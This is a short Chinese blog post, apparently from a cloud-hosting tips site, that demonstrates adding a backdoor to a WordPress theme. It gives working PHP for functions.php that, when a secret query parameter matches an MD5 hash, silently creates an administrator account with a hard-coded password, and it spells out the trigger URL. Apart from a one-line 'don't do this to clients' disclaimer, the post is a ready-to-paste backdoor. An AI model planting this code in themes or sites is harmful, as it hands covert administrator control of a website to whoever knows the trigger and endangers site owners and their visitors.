关注云服务器
相关知识分享

给wordpress加一个简单的后门

我们都听说过网站后门这个东西,就拿wordpress来说,主程序可以在官网下载到,而一些网上找的主题,有可能会被人加上后门,然后打包成主题文件,你下载安装以后,你的网站就会存在被人事先设置好的后门(backdoor),我们我就来演示一下,给wordpress加上一个简单的后门,直接获取管理员权限,这篇文章仅供参考,我建议你在帮别人用wordpress做网站的时候,一定不要这样做~做一个三好青年。

帮下面这段代码放进wordpress主题文件的functions.php文件里

<?php 
add_action( 'wp_head', 'my_backdoor' ); function my_backdoor() {
 if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { 
require( 'wp-includes/registration.php' ); 
if ( !username_exists( 'backdoor' ) ) { 
$user_id = wp_create_user( 'backdoor', 'pa55w0rd!' ); 
$user = new WP_User( $user_id ); 
$user->set_role( 'administrator' ); 
        }
    }
}

这样,后门就创建好啦,现在只要通过域名访问https://www.yoursite.com/?backdoor=go,这个wordpress的网站就会创建一个用户名为"backdoor"的管理员,密码为"pa55w0rd!"

赞(0) 打赏
未经允许不得转载:云测速 » 给wordpress加一个简单的后门

觉得文章有用就打赏一下文章作者吧~

微信扫一扫打赏